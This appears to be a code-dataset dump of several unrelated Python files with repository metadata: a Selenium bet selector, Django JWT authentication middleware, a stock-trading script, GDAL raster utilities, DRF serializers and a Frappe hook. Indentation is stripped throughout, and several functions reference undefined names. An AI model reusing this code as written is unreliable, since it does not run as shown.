except NoSuchElementException:
self.driver.close()
messagebox.showinfo(
"Bet Selector", "Loading took too much time or Not yet defined.")
else:
messagebox.showinfo(
"Bet Selector", "Your Bet File '{}' is Empty.".format(self.file_name))
def readFileContent(self):
with open(self.file_path, 'r') as f:
file_content = f.read().split('\n')
file_content = list(filter(None, file_content))
return file_content
def collectCheckboxsIDs(self):
checkboxs = self.driver.find_elements_by_class_name("checkbox")
IDs_list = []
for el in checkboxs:
IDs_list.append(el.get_attribute('id'))
IDs_list = [IDs_list[x:x+9] for x in range(0, len(IDs_list), 9)]
IDs_list.insert(0, [])
for lis in IDs_list:
lis.insert(0, "")
self.IDs_list = IDs_list
def selectCheckbox(self):
for line in self.file_content:
line = line.split(',')
row = 1
for choice in line:
i = 0
while i < len(choice):
self.driver.find_element_by_id(
self.IDs_list[row][int(choice[i])]).click()
i += 1
row += 1
self.driver.find_element_by_xpath(
'//*[@title="Add to Slip"]').click()
| abdlalisalmi/UpWork-Select-Checkbox-in-a-Web-Page-with-Python-Selenium | App/Core.py | Core.py | py | 2,090 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.split",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "selenium.common.exceptions.NoSuchElementException",
"line_number": 25,
"usage_type": "name"
},
{
"api_... |
30990966321 | # need to implement CSRF
from rest_framework.authentication import CSRFCheck
from rest_framework_simplejwt.authentication import JWTAuthentication
from rest_framework import exceptions
from channels.db import database_sync_to_async
from server.settings import SIMPLE_JWT
from django.core.exceptions import ObjectDoesNotExist
from rest_framework_simplejwt.tokens import UntypedToken, TokenError
from urllib.parse import parse_qs
from server.settings import SIMPLE_JWT, SECRET_KEY
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser
import jwt
def enforce_csrf(request):
check = CSRFCheck()
check.process_request(request)
reason = check.process_view(request, None, (), {})
if reason:
raise exceptions.PermissionDenied('CSRF failed: %s' % reason)
class CustomAuthentication(JWTAuthentication):
def authenticate(self, request):
header = self.get_header(request)
if header is None:
raw_token = request.COOKIES.get(SIMPLE_JWT['AUTH_COOKIE']) or None
else:
raw_token = self.get_raw_token(header)
if raw_token is None:
return None
validated_token = self.get_validated_token(raw_token)
enforce_csrf(request)
return self.get_user(validated_token), validated_token
@database_sync_to_async
def get_user(user_id):
try:
return get_user_model().objects.get(pk=user_id)
except ObjectDoesNotExist:
return AnonymousUser()
class TokenAuthMiddleWare:
def __init__(self, app):
self.app = app
async def __call__(self, scope, receive, send):
# needs utf8 to decode from byte format b''
user_id = -1
try:
raw_token = parse_qs(scope["query_string"].decode("utf8"))["token"][0]
UntypedToken(raw_token)
decode_token = jwt.decode(raw_token, SECRET_KEY, SIMPLE_JWT["ALGORITHM"])
user_id = decode_token['user_id']
except:
print("Token is invalid")
finally:
user = await get_user(user_id)
return await self.app(dict(scope, user=user), receive, send)
| Kredam/MyRoom | back-end/server/api/authentication.py | authentication.py | py | 2,167 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "rest_framework.authentication.CSRFCheck",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "rest_framework.exceptions.PermissionDenied",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "rest_framework.exceptions",
"line_number": 20,
"usage_... |
15969653865 | #!/usr/bin/env python
## Test an algorithm in real life
import sys
if sys.version_info[0] != 3 or sys.version_info[1] < 6:
print("This script requires Python version >=3.6")
sys.exit(1)
import algorithms
import datetime
import exchange
import pandas_market_calendars as mcal
import portfolioLive
## Main function
def main():
today = datetime.date.today()
nyse = mcal.get_calendar('NYSE')
if len(nyse.valid_days(start_date=today, end_date=today)) == 0:
print("Markets are closed today")
return
with open("symbolsPruned", "r", newline="\n") as file:
symbols = file.read().strip().split("\n")
exchange.init(
symbols,
period=1,
historyDays=algorithms.KIPPslowDays)
p = portfolioLive.Portfolio()
algorithms.KIPP(symbols, p)
if __name__ == "__main__":
main()
| WattsUp/PyStonks | stonks/live.py | live.py | py | 810 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "sys.version_info",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "sys.exit",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "datetime.date.today",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "datetime.date",
... |
13346852826 | from osgeo import gdalnumeric
from osgeo import osr
from osgeo import gdal
from osgeo.gdal_array import *
from osgeo.gdalconst import *
from PIL import Image
import pylab as P
import os
import numpy as np
from IPython.core.debugger import set_trace
def readData(filename, ndtype=np.float64):
'''
z=readData('/path/to/file')
'''
if os.path.isfile(filename):
return LoadFile(filename).astype(ndtype);
else:
return gdal.Open(filename, gdal.GA_ReadOnly).readAsArray()
def writeTiff(ary, coord, filename='kgiAlos.tif', rescale=None, format=gdal.GDT_Float64,lon=None, lat=None, nodata=None, grid=False, cog=False, srs_proj4='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs', options=[], gcps=None):
'''writeTiff(ary, geoTransform, filename='kgiAlos.tif', rescale=None, format=gdal.GDT_Float64 ,lon=None, lat=None):
ary: 2D array.
geoTransform: [top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution]
rescale: [min max]: If given rescale ary values between min and max.
If lon lat is specified set coord to None
'''
if coord is None and gcps is None:
import scipy
import scipy.linalg
s=[sk//10 for sk in ary.shape]
ary10=ary[::s[0],::s[1]];
lon10=lon[::s[0],::s[1]];
lat10=lat[::s[0],::s[1]];
#P.figure()
#P.scatter(lon10.ravel(), lat10.ravel(), 5, ary10.ravel(), edgecolors='none')
A=np.ones([np.multiply(*ary10.shape),3])
line,pixel=np.meshgrid(np.r_[0:ary.shape[0]:s[0]],np.r_[0:ary.shape[1]:s[1]])
A[:,1]=pixel.ravel()
A[:,2]=line.ravel()
xlon=np.dot(scipy.linalg.pinv(A), lon10.ravel())
xlat=np.dot(scipy.linalg.pinv(A), lat10.ravel())
##check flip flop
#if xlon[1]<0: #flip lr
# ary=np.fliplr(ary)
#
#if xlat[2]>0: #flip ud
# ary=np.flipud(ary)
coord=[xlon[0],xlon[2], xlon[1], xlat[0], xlat[2], xlat[1]];
print(coord)
#x=lon[0,0]
#y=lat[0,0]
#dx=lon[0,1]-lon[0,0]
#dy=lat[1,0]-lat[0,0]
#xrot=0.
#yrot=0.
#coord=[x,dx, xrot, y,yrot, dy]
if grid:
import scipy.interpolate
LON,LAT=np.meshgrid(np.r_[lon.min():lon.max():abs(coord[1])], np.r_[lat.max():lat.min():-abs(coord[5])])
#ary=P.griddata(lon.ravel(),lat.ravel(),ary.ravel(),LON,LAT);
ary=scipy.interpolate.griddata(np.array([lon.ravel(),lat.ravel()]).T,ary.ravel(),(LON,LAT), method='cubic');
coord=[LON[0,0],abs(coord[1]), 0, LAT[0,0], 0,-abs(coord[5])];
print(coord)
if rescale:
import basic
ary=basic.rescale(ary, rescale);
# data exists in 'ary' with values range 0 - 255
# Uncomment next line if ary[0][0] is upper-left corner
#ary = numpy.flipup(ary)
if ary.ndim==2:
Ny, Nx = ary.shape
Nb=1;
#ds = driver.Create(filename, Nx, Ny, 1, gdal.GDT_Float64)
elif ary.ndim==3:
Ny,Nx,Nb = ary.shape #Nb: number of bands. #osgeo.gdal expects, (band, row, col), so this is a deviation from that.
else:
print("Input array has to be 2D or 3D.")
return None
driver = gdal.GetDriverByName("GTiff")
if cog:
options = ["TILED=YES","COMPRESS=LZW","INTERLEAVE=BAND","BIGTIFF=YES"]
ds = driver.Create(filename, Nx, Ny, Nb, gdal.GDT_Float64, options)
srs=osr.SpatialReference()
srs.ImportFromProj4(srs_proj4)
ds.SetProjection(srs.ExportToWkt() );
#ds.SetGeoTransform( ... ) # define GeoTransform tuple
# top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution
if gcps is None:
ds.SetGeoTransform( coord )
else:
if type(gcps[0])== gdal.GCP:
ds.SetGCPs(gcps, srs.ExportToWkt())
elif type(gcps[0])==np.int and len(gcps)==2 and lat is not None:
gcps_list=create_gcp_list(lon,lat,np.zeros(lat.shape), gcp_count=[gcps[0], gcps[1]])
ds.SetGCPs(gcp_list, srs.ExportToWkt())
else:
print('unsupported type of GCPs. Skipping.')
if nodata is not None:
ds.GetRasterBand(1).SetNoDataValue(nodata);
if Nb==1:
ds.GetRasterBand(1).WriteArray(ary)
else:
for b in range(Nb):
ds.GetRasterBand(b+1).WriteArray(ary[:,:,b])
# optimize for COG
if cog:
ds.BuildOverviews("NEAREST", [2, 4, 8, 16, 32, 64, 128, 256])
ds = None
print("File written to: " + filename);
def create_gcp_list(x,y,z,p=None, l=None,gcp_count=[2,2]):
"""create_gcp_list(x,y,z,p=None, l=None, gcp_count=[2,2])
if xyz is in the same shape as image, uses gcp count to select a reasonable amount of gcps.
if xyz is not in the same shape as image, p and l need to be provided to select the correct pixel and line.
"""
gcp_list=[]
if l is None or p is None:
p=np.linspace(0,x.shape[0]-1, gcp_count[0]).astype(int)
l=np.linspace(0,x.shape[1]-1, gcp_count[1]).astype(int)
for pp in p:
for ll in l:
gcp=gdal.GCP(x[pp,ll], y[pp,ll], z[pp,ll], float(pp), float(ll))
gcp_list.append(gcp)
else:
p=p.ravel().astype(float)
l=l.ravel().astype(float)
x=x.ravel()
y=y.ravel()
z=z.ravel()
for k in range(l.size):
gcp=gdal.GCP(x[k], y[k], z[k], p[k], l[k])
gcp_list.append(gcp)
return gcp_list
def writeAny(ary, coord, fileformat="GTiff", filename='kgiAlos.tif', rescale=None, format=gdal.GDT_Float64,lon=None, lat=None, nodata=None, grid=False, srs_proj4='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs'):
'''writeAny(ary, geoTransform, format="GTiff", filename='kgiAlos.tif', rescale=None, format=gdal.GDT_Float64 ,lon=None, lat=None):
ary: 2D array.
geoTransform: [top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution]
format: "GTiff"
rescale: [min max]: If given rescale ary values between min and max.
If lon lat is specified set coord to None
'''
if coord is None:
import scipy
import scipy.linalg
s=[sk//10 for sk in ary.shape]#BRANDON EDIT FOR COMPATIBILITY: changed / to // for python 3
ary10=ary[::s[0],::s[1]];
lon10=lon[::s[0],::s[1]];
lat10=lat[::s[0],::s[1]];
#P.figure()
#P.scatter(lon10.ravel(), lat10.ravel(), 5, ary10.ravel(), edgecolors='none')
A=np.ones([np.multiply(*ary10.shape),3])
line,pixel=np.meshgrid(np.r_[0:ary.shape[0]:s[0]],np.r_[0:ary.shape[1]:s[1]])
A[:,1]=pixel.ravel()
A[:,2]=line.ravel()
xlon=np.dot(scipy.linalg.pinv(A), lon10.ravel())
xlat=np.dot(scipy.linalg.pinv(A), lat10.ravel())
##check flip flop
#if xlon[1]<0: #flip lr
# ary=np.fliplr(ary)
#
#if xlat[2]>0: #flip ud
# ary=np.flipud(ary)
coord=[xlon[0],xlon[2], xlon[1], xlat[0], xlat[2], xlat[1]];
print(coord)
#x=lon[0,0]
#y=lat[0,0]
#dx=lon[0,1]-lon[0,0]
#dy=lat[1,0]-lat[0,0]
#xrot=0.
#yrot=0.
#coord=[x,dx, xrot, y,yrot, dy]
if grid:
import scipy.interpolate
LON,LAT=np.meshgrid(np.r_[lon.min():lon.max():abs(coord[1])], np.r_[lat.max():lat.min():-abs(coord[5])])
#ary=P.griddata(lon.ravel(),lat.ravel(),ary.ravel(),LON,LAT);
ary=scipy.interpolate.griddata(np.array([lon.ravel(),lat.ravel()]).T,ary.ravel(),(LON,LAT), method='cubic');
coord=[LON[0,0],abs(coord[1]), 0, LAT[0,0], 0,-abs(coord[5])];
print(coord)
if rescale:
import basic
ary=basic.rescale(ary, rescale);
# data exists in 'ary' with values range 0 - 255
# Uncomment next line if ary[0][0] is upper-left corner
#ary = numpy.flipup(ary)
if ary.ndim ==2:
Ny, Nx = ary.shape
Nb = 1;
elif ary.ndim==3:
Ny,Nx,Nb=ary.shape
else:
print("Input array has to be 2D or 3D.")
return None
driver = gdal.GetDriverByName(fileformat)
ds = driver.Create(filename, Nx, Ny, Nb, gdal.GDT_Float64)
#ds.SetGeoTransform( ... ) # define GeoTransform tuple
# top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution
ds.SetGeoTransform( coord )
srs=osr.SpatialReference()
srs.ImportFromProj4(srs_proj4)
ds.SetProjection(srs.ExportToWkt() );
if nodata is not None:
ds.GetRasterBand(1).SetNoDataValue(0);
if Nb==1:
ds.GetRasterBand(1).WriteArray(ary)
else:
for b in range(Nb):
ds.GetRasterBand(b+1).WriteArray(ary[:,:,b])
ds = None
print("File written to: " + filename);
def writeCSV(ary, filename='gis_file.csv', geotransform=None, rescale=None, format="%f", lon=None, lat=None, nodata=None, grid=False, srs_proj4='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs'):
'''writeCSV(ary, geoTransform=None, format="GTiff", filename='gis_file.csv', rescale=None, format="%f" ,lon=None, lat=None):
ary: 2D array.
geoTransform: [top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution]
format: "GTiff"
rescale: [min max]: If given rescale ary values between min and max.
'''
if geotransform is None:
import scipy
import scipy.linalg
s=[sk//10 for sk in ary.shape]
ary10=ary[::s[0],::s[1]];
lon10=lon[::s[0],::s[1]];
lat10=lat[::s[0],::s[1]];
#P.figure()
#P.scatter(lon10.ravel(), lat10.ravel(), 5, ary10.ravel(), edgecolors='none')
A=np.ones([np.multiply(*ary10.shape),3])
line,pixel=np.meshgrid(np.r_[0:ary.shape[0]:s[0]],np.r_[0:ary.shape[1]:s[1]])
A[:,1]=pixel.ravel()
A[:,2]=line.ravel()
xlon=np.dot(scipy.linalg.pinv(A), lon10.ravel())
xlat=np.dot(scipy.linalg.pinv(A), lat10.ravel())
##check flip flop
#if xlon[1]<0: #flip lr
# ary=np.fliplr(ary)
#
#if xlat[2]>0: #flip ud
# ary=np.flipud(ary)
geotransform=[xlon[0],xlon[2], xlon[1], xlat[0], xlat[2], xlat[1]];
print(geotransform)
#x=lon[0,0]
#y=lat[0,0]
#dx=lon[0,1]-lon[0,0]
#dy=lat[1,0]-lat[0,0]
#xrot=0.
#yrot=0.
#coord=[x,dx, xrot, y,yrot, dy]
if grid:
import scipy.interpolate
LON,LAT=np.meshgrid(np.r_[lon.min():lon.max():abs(coord[1])], np.r_[lat.max():lat.min():-abs(coord[5])])
#ary=P.griddata(lon.ravel(),lat.ravel(),ary.ravel(),LON,LAT);
ary=scipy.interpolate.griddata(np.array([lon.ravel(),lat.ravel()]).T,ary.ravel(),(LON,LAT), method='cubic');
geotransform=[LON[0,0],abs(coord[1]), 0, LAT[0,0], 0,-abs(coord[5])];
print(geotransform)
else:
y = np.linspace(1, ary.shape[0], ary.shape[0])
x = np.linspace(1, ary.shape[1], ary.shape[1])
Y,X=np.meshgrid(y,x ,indexing='ij')
lon=geotransform[0]+geotransform[1]*X+Y*geotransform[2]
lat=geotransform[3]+geotransform[4]*X+Y*geotransform[5]
if rescale:
import basic
ary=basic.rescale(ary, rescale);
# data exists in 'ary' with values range 0 - 255
# Uncomment next line if ary[0][0] is upper-left corner
#ary = numpy.flipup(ary)
Ny, Nx = ary.shape
item_length=Ny*Nx
import csv
lol=[lon.ravel(), lat.ravel(), ary.ravel()]
with open(filename, 'wb') as test_file:
file_writer = csv.writer(test_file)
for i in range(item_length):
file_writer.writerow([x[i] for x in lol])
print("File written to: " + filename);
def readCoord(filename, srs_proj4=None, dtype=np.float64):
'''
lon,lat=lonlat('/path/to/file', srs_proj4=None)
'''
#http://stackoverflow.com/questions/2922532/obtain-latitude-and-longitude-from-a-geotiff-file
# get the existing coordinate system
xn,yn,xN,yN=corners(filename);
ds = gdal.Open(filename)
if srs_proj4 is None:
old_cs=osr.SpatialReference()
old_cs.ImportFromWkt(ds.GetProjectionRef())
else:
old_cs=osr.SpatialReference()
old_cs.ImportFromProj4(srs_proj4);
# create the new coordinate system
wgs84_wkt = """
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.01745329251994328,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]]"""
new_cs = osr.SpatialReference()
new_cs .ImportFromWkt(wgs84_wkt)
# create a transform object to convert between coordinate systems
transform = osr.CoordinateTransformation(old_cs,new_cs)
#get the point to transform, pixel (0,0) in this case
#width = ds.RasterXSize
#height = ds.RasterYSize
#gt = ds.GetGeoTransform()
#minx = gt[0]
#miny = gt[3] + width*gt[4] + height*gt[5]
#get the coordinates in lat long
#latlong = transform.TransformPoint(minx,miny)
lonn,latn,z=transform.TransformPoint(xn,yn)
# print(latn, lon)
#lonN,latn,z=transform.TransformPoint(xN,yn)
lonN,latN,z=transform.TransformPoint(xN,yN)
lat=np.linspace(latn,latN,ds.RasterYSize).astype(dtype);
lon=np.linspace(lonn,lonN,ds.RasterXSize).astype(dtype);
LON,LAT=np.meshgrid(lon,lat);
return LON, np.flipud(LAT);
def corners(filename):
'''
(minx,miny,maxx,maxy)=corners('/path/to/file')
'''
#http://stackoverflow.com/questions/2922532/obtain-latitude-and-longitude-from-a-geotiff-file
ds = gdal.Open(filename)
width = ds.RasterXSize
height = ds.RasterYSize
gt = ds.GetGeoTransform()
minx = gt[0]
miny = gt[3] + width*gt[4] + height*gt[5]
maxx = gt[0] + width*gt[1] + height*gt[2]
maxy = gt[3]
return (minx,miny,maxx,maxy)
def bounding_box(filename):
"""
((lon1,lat1), (lon2,lat2), (lon3,lat3), (lon4,lat4))=bounding_box('/path/to/file')
"""
gT=getGeoTransform(filename)
width, height=get_size(filename)
return (xy2coord(0,0,gT), xy2coord(width,0,gT), xy2coord(width, height,gT), xy2coord(0, height,gT))
def xy2coord(x,y,gT):
'''
lon,lat=xy2coord(x,y,geoTransform)
projects pixel index to position based on geotransform.
'''
coord_x=gT[0] + x*gT[1] + y*gT[2]
coord_y=gT[3] + x*gT[4] + y*gT[5]
return coord_x, coord_y
def coord2xy(x,y,gT):
'''
x,y = coord2xy(lon, lat, geoTransform)
calculates pixel index closest to the lon, lat.
'''
#ref: https://gis.stackexchange.com/questions/221292/retrieve-pixel-value-with-geographic-coordinate-as-input-with-gdal/221430
xOrigin = gT[0]
yOrigin = gT[3]
pixelWidth = gT[1]
pixelHeight = -gT[5]
col = np.array((x - xOrigin) / pixelWidth).astype(int)
row = np.array((yOrigin - y) / pixelHeight).astype(int)
return row,col
def getGeoTransform(filename):
'''
[top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution]=getGeoTransform('/path/to/file')
'''
#http://stackoverflow.com/questions/2922532/obtain-latitude-and-longitude-from-a-geotiff-file
ds = gdal.Open(filename)
return ds.GetGeoTransform()
def get_size(filename):
"""(width, height) = get_size(filename)
"""
ds = gdal.Open(filename)
width = ds.RasterXSize
height = ds.RasterYSize
ds=None
return (width, height)
def get_proj4(filename):
ds=gdal.Open(filename)
sr=gdal.osr.SpatialReference()
sr.ImportFromWkt(ds.GetProjectionRef)
return sr.ExportToProj4()
def transformPoint(x,y,z,s_srs='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs', t_srs='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs'):
'''
transformPoint(x,y,z,s_srs='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs', t_srs='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs')
Known Bugs: gdal transform may fail if a proj4 string can not be found for the EPSG or WKT formats.
'''
from .. import base
srs_cs=osr.SpatialReference()
if "EPSG" == s_srs[0:4]:
srs_cs.ImportFromEPSG(int(s_srs.split(':')[1]));
elif "GEOCCS" == s_srs[0:6]:
srs_cs.ImportFromWkt(s_srs);
else:
srs_cs.ImportFromProj4(s_srs);
trs_cs=osr.SpatialReference()
if "EPSG" == t_srs[0:4]:
trs_cs.ImportFromEPSG(int(t_srs.split(':')[1]));
elif "GEOCCS" == t_srs[0:6]:
trs_cs.ImportFromWkt(t_srs);
else:
trs_cs.ImportFromProj4(t_srs);
transform = osr.CoordinateTransformation(srs_cs,trs_cs)
if base.numel(x)>1:
return [ transformPoint(x[k], y[k], z[k]) for k in range(base.numel(x))]
else:
try:
return transform.TransformPoint((x,y,z));
except:
return transform.TransformPoint(x,y,z)
def rsat2_export(filename, export_filename=None, yclip=225):
""" 'export_filename'=rsat2_export(filename, export_filename=None, yclip=225)
"""
ds=gdal.Open(filename, gdal.GA_ReadOnly)
w=ds.RasterXSize
h=ds.RasterYSize
data=10.*np.log10(abs(ds.ReadAsArray(ysize=ds.RasterYSize-yclip)))
gT=ds.GetGeoTransform()
if export_filename is None:
timestr=''.join(ds.GetMetadata()['ACQUISITION_START_TIME'].split(".")[0].split(":"))
export_filename='_'.join(filename.split(":")[0:2])+"_"+timestr+"_cog.tif"
data[data==-np.inf]=np.nan
data[data==np.inf]=np.nan #should not be necessary
writeTiff(data, gT, filename=export_filename, cog=True, gcps=ds.GetGCPs(), nodata=np.nan)
return export_filename
def clip_gT(gT, xmin, xmax, ymin, ymax, method='image'):
'''calculate new geotransform for a clipped raster either using pixels or projected coordinates.
clipped_gT=clip_gT(gT, xmin, xmax, ymin, ymax, method='image')
method: 'image' | 'coord'
'''
if method == 'image':
y,x=xy2coord(ymin, xmin, gT); #top left, reference, coordinate
if method == 'coord':
#find nearest pixel
yi, xi = coord2xy(ymin, xmin, gT)
#get pixel coordinate
y,x=xy2coord(yi, xi, gT)
gTc=list(gT)
gTc[0]=y
gTc[3]=x
return tuple(gTc)
def auto_clip(arr, gT, no_data=np.nan):
"""automatically remova the excess no-data pixels in raster. Similar to auto_clip in GIMP.
cliipped_raster, clipped_gT = auto_clip(raster, geoTransform, no_data=np.nan)
"""
if np.isnan(no_data):
m=~np.isnan(arr)
else:
m= arr!=no_data
data_cols = numpy.where(m.sum(0) > 50)[0]
data_rows = numpy.where(m.sum(1) > 50)[0]
gTc=clip_gT(gT, data_rows[0], data_rows[-1], data_cols[0], data_cols[-1])
arrC=arr[data_rows[0]:data_rows[-1], data_cols[0]:data_cols[-1]]
return arrC, gTc
def translate_gT(gT, x_offset, y_offset):
'''gT_translated=translate_gT(gT, x_offset, y_offset)
simply offsets the starting 0th and 3rd elements of geotransform accordingly.
'''
gTt=list(gT)
gTt[0]=gTt[0]+x_offset
gTt[3]=gTt[3]+y_offset
return tuple(gTt)
def translate_tif(filename, x_offset, y_offset):
arr=readData(filename)
gT=getGeoTransform(filename)
gTt=gsp.connectors.gdal.translate_gT(gT, x_offset, y_offset)
writeTiff(arr, gTt, filename=filename[-4]+'_translated.tif')
return filename[:-4]+'_translated.tif'
def auto_clip_tif(f, no_data=np.nan):
print('Reading {}'.format(f))
arr=readData(f)
gT=getGeoTransform(f)
if np.isnan(no_data):
m=~np.isnan(arr)
else:
m= arr!=no_data
data_cols = numpy.where(m.sum(0) > 50)[0]
data_rows = numpy.where(m.sum(1) > 50)[0]
gTc=clip_gT(gT, data_rows[0], data_rows[-1], data_cols[0], data_cols[-1])
arrC=arr[data_rows[0]:data_rows[-1], data_cols[0]:data_cols[-1]]
writeTiff(arrC, gTc, filename=f[:-4]+'_clipped.tif')
def distance_lat_lon(lat1, lon1, lat2, lon2):
p = 0.017453292519943295
a = 0.5 - np.cos((lat2-lat1)*p)/2 + np.cos(lat1*p)*np.cos(lat2*p) * (1-np.cos((lon2-lon1)*p)) / 2
return 12742 * np.arcsin(np.sqrt(a))
def closest_lat_lon(lat_vector, lon_vector, lat_point, lon_point):
"""
Find the closest index in a vector.
index = closest_lat_lon(lat_vector, lon_vector, lat_point, lon_point)
"""
return np.argmin(distance_lat_lon(lat_vector, lon_vector,lat_point,lon_point))
def get_point_value(filename, x,y,srs_proj4='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs', band=1):
"""
z=get_point_value(filename, x,y,srs_proj4='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs')
"""
ds=gdal.Open(filename, gdal.GA_ReadOnly)
w=ds.RasterXSize
h=ds.RasterYSize
gT=ds.GetGeoTransform()
t_srs=get_proj4(filename)
rb=ds.GetRasterBand(band)
if t_srs != srs_proj4:
x,y,z=transformPoint(x,y,z,s_srs=srs_proj4, t_srs=t_srs)
cx,cy=coord2xy(x,y,gT)
return rb.ReadAsArray(px,py,1,1)[0]
| bosmanoglu/adore-doris | lib/python/gis.py | gis.py | py | 21,211 | python | en | code | 13 | github-code | 36 | [
{
"api_name": "numpy.float64",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.path.isfile",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "osgeo.gdal.Open",
... |
31746754037 | from django.core.exceptions import ValidationError
from rest_framework import serializers
from reviews.models import Category, Comment, Genre, Review, Title, User
class ConfirmationTokenSerializer(serializers.Serializer):
"""Serializing verification data to provide full user registration"""
username = serializers.CharField(required=True)
confirmation_code = serializers.CharField(required=True)
class RegistrationSerializer(serializers.Serializer):
"""Serializing data to provide a user creation"""
email = serializers.EmailField(required=True)
username = serializers.CharField(required=True)
def validate(self, data):
if data["username"] == "me":
raise ValidationError("Пользователь не может иметь имя 'me'")
return data
class UserSerializer(serializers.ModelSerializer):
"""Serializing data for work with user and his profile"""
class Meta:
model = User
fields = (
"username",
"first_name",
"last_name",
"email",
"bio",
"role",
)
class CategorySerializer(serializers.ModelSerializer):
"""Serializer for categories."""
class Meta:
model = Category
fields = ("name", "slug")
lookup_field = 'slug'
class GenreSerializer(serializers.ModelSerializer):
"""Serializer for genres."""
class Meta:
model = Genre
fields = ("name", "slug")
class WriteTitleSerializer(serializers.ModelSerializer):
"""Serializer for write request for titles."""
category = serializers.SlugRelatedField(
slug_field="slug",
queryset=Category.objects.all(),
)
genre = serializers.SlugRelatedField(
many=True,
slug_field="slug",
queryset=Genre.objects.all(),
)
rating = serializers.SerializerMethodField()
class Meta:
model = Title
fields = "__all__"
def get_rating(self, obj):
"""Return 0 after creation."""
return 0
class ReadTitleSerializer(serializers.ModelSerializer):
"""Serializer for read requests for titles."""
genre = GenreSerializer(many=True)
category = CategorySerializer()
rating = serializers.SerializerMethodField()
class Meta:
model = Title
fields = "__all__"
read_only_fields = ("name", "year", "description", "genre", "category")
def get_rating(self, obj):
"""Return object rating calculated in viewset."""
return obj.rating
class ReviewSerializer(serializers.ModelSerializer):
"""Serializer for reviews."""
score = serializers.IntegerField(max_value=10, min_value=0)
author = serializers.SlugRelatedField(
slug_field="username",
read_only=True,
default=serializers.CurrentUserDefault(), # добавил новое
)
class Meta:
model = Review
fields = ("id", "text", "author", "score", "pub_date")
def validate(self, attrs):
"""Check that each author can have only one review
for particular title.
"""
if not self.context["request"].method == "POST":
return attrs
if Review.objects.filter(
title_id=self.context["view"].kwargs.get("title_id"),
author=self.context["request"].user,
).exists():
raise serializers.ValidationError(
(
"Автор может оставлять ревью на каждое произведение "
"только один раз"
)
)
return attrs
class CommentSerializer(serializers.ModelSerializer):
"""Serializer for comments."""
author = serializers.SlugRelatedField(
slug_field="username",
read_only=True,
)
class Meta:
model = Comment
fields = ("id", "text", "author", "pub_date")
| GenVas/yamdb_final | api/serializers.py | serializers.py | py | 3,954 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "rest_framework.serializers.Serializer",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.serializers",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "rest_framework.serializers.CharField",
"line_number": 10,
"usage_type... |
18664116649 | from pathlib import Path
import joblib
IS_KAGGLE = True
if IS_KAGGLE:
DATA_DIR = Path("/kaggle/working/chap5-data")
OUTPUT_DIR = Path("/kaggle/working/")
else:
DATA_DIR = Path("../data") # Path(os.getenv("QQP_DATA_DIR", "/data"))
OUTPUT_DIR = Path("../outputs")
INPUT_DIR = DATA_DIR / "input"
TRAIN_CSV_PATH = INPUT_DIR / "train.csv"
TEST_CSV_PATH = INPUT_DIR / "test.csv"
EMBEDDING_DIR = DATA_DIR / "embeddings"
GLOVE_PATH = EMBEDDING_DIR / "glove.840B.300d.bin"
FEATURE_MEMORY = joblib.Memory(DATA_DIR / "cache")
SPLIT_RANDOM_SEED = 1
EPS = 1e-10
NUM_PROCESSES = 4 # int(os.getenv("NUM_PROCESSES", 1))
NUM_TRAIN_SAMPLES = 404290
NUM_TEST_SAMPLES = 2345796
NUM_DRYRUN_SAMPLES = 1000
| room-208/Kaggle-Gokui-Book | chap5/common/constants.py | constants.py | py | 708 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number"... |
72056734183 | from warnings import filters
from billing.billing.api.sales_invoice.create_sales_invoice import re_eveluate_sales_orders
# from billing.billing.utils.payment_notifications import get_party_phone
import frappe
from datetime import date
from frappe.utils.background_jobs import enqueue
from frappe.utils.data import nowdate
def calculate_age(birthDate):
days_in_year = 365.2425
age = int((date.today() - birthDate).days / days_in_year)
return age
def lab_test_after_insert_hook(doc,state):
patient = doc.get('patient')
dob = frappe.db.get_value('Patient',{ 'name':patient }, 'dob')
gender = frappe.db.get_value('Patient',{ 'name':patient }, 'gender')
sex = frappe.db.get_value('Patient',{ 'name':patient }, 'sex')
doc.patient_age = age_calc(dob,doc.name)
doc.patient_sex = gender or sex
doc.save(ignore_permissions=True)
